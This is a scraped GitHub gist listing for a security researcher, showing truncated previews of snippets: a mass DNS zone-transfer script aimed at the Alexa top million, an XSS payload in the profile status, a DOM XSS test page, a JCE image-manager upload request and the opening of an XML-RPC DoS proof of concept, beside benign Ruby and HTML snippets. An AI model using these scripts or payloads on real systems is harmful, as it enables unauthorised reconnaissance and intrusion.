Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
"><img src=x onerror=alert('Github @ethicalhack3r')><"

Ryan Dewhurst ethicalhack3r

💭
"><img src=x onerror=alert('Github @ethicalhack3r')><"
View GitHub Profile
@ethicalhack3r
ethicalhack3r / gist:5982734
Created Jul 12, 2013
The array size decreases on delete, however, the 'internal loop counter' stays the same.
View gist:5982734
a=[1,2,3,4]; a.each_with_index{|e,i| p "Iteration #{i}: delete #{e} - size of array #{a.size}"; a.delete(e) }
"Iteration 0: delete 1 - size of array 4"
"Iteration 1: delete 3 - size of array 3"
=> [2, 4]
@ethicalhack3r
ethicalhack3r / gist:6145925
Created Aug 3, 2013
Zone Transfer Alexa Top 1 Million using dnsrecon
View gist:6145925
#!/bin/bash
while read LINE ; do
N=$((N+1))
echo "$N - $LINE"
python dnsrecon.py -d $LINE -t axfr -c axfr_results/$N-$LINE.csv
done < alexa.txt
@ethicalhack3r
ethicalhack3r / gist:6296321
Created Aug 21, 2013
DOM XSS - Exploitable without user entering/pasting payload?
View gist:6296321
<html>
<head>
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
<script>
$(function(){
$( "#button" ).click(function() {
var query = $("form#DevSearch").find('input[type=text]').val();
$("span#searchQuery").html(query);
View gist:6336676
POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1
Host: www.ethicalhack3r.co.uk
User-Agent: BOT/0.1 (BOT for JCE)
Content-Type: multipart/form-data; boundary=---------------------------41184676334
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: Close
Proxy-Connection: close
Content-Length: 1337
View gist:6336705
Every 2.0s: ls -l /tmp/ Sun Aug 25 23:32:20 2013
total 52
-rw------- 1 nginx nginx 650 Aug 25 22:50 phpFi0W7e
-rw------- 1 nginx nginx 1862 Apr 24 10:53 phpLm2rDl
-rw------- 1 nginx nginx 26468 Jun 19 01:33 phpLp8mgp
-rw------- 1 nginx nginx 730 Aug 15 16:24 phpOKZhXI
-rw------- 1 nginx nginx 730 Aug 15 16:24 phpT1EBnQ
-rw------- 1 nginx nginx 1862 Apr 23 23:24 phpkCvyLZ
View gist:6779373
<a href=”http://www.example.com”>Some Example</a>
<a href=”http://www.example.com”>http://www.example.com</a>
View gist:9784512
# PATCH/PUT /submits/1
# PATCH/PUT /submits/1.json
def update
respond_to do |format|
if @submit.status == 'PENDING'
if @submit.update(submit_params)
format.html { redirect_to @submit, notice: 'Submission was successfully updated.' }
format.json { head :no_content }
end
else
View gist:9914033
ryans-mbp-2:ThreadFix_2.0FINAL ryan$ bash threadfix.sh
Looking for a key in /Users/ryan/Downloads/ThreadFix_2.0FINAL/tomcat/keystore
Generated a keystore.
Usage: {start|stop}
ryans-mbp-2:ThreadFix_2.0FINAL ryan$ bash threadfix.sh start
Looking for a key in /Users/ryan/Downloads/ThreadFix_2.0FINAL/tomcat/keystore
Using pre-generated keystore.
mkdir: ./tomcat/logs: File exists
Using CATALINA_BASE: ./tomcat
Using CATALINA_HOME: ./tomcat
@ethicalhack3r
ethicalhack3r / wp_dos.py
Created Aug 7, 2014
WP XML-RPC DoS Exploit
View wp_dos.py
#################################################################################
# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS#
# Author: Nir Goldshlager - Salesforce.com Product Security Team#
# This is a Proof of Concept Exploit, Please use responsibly.#
#################################################################################
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import urllib
@ethicalhack3r
ethicalhack3r / test.html
Created Sep 18, 2014
Entering version numbers in HTML form
View test.html
<!DOCTYPE html>
<html>
<body>
<input type="text" name="version1" value="1.0">
<select>
<option value="&lt;">&lt;</option>
<option value="&gt;">&gt;</option>
<option value="=">=</option>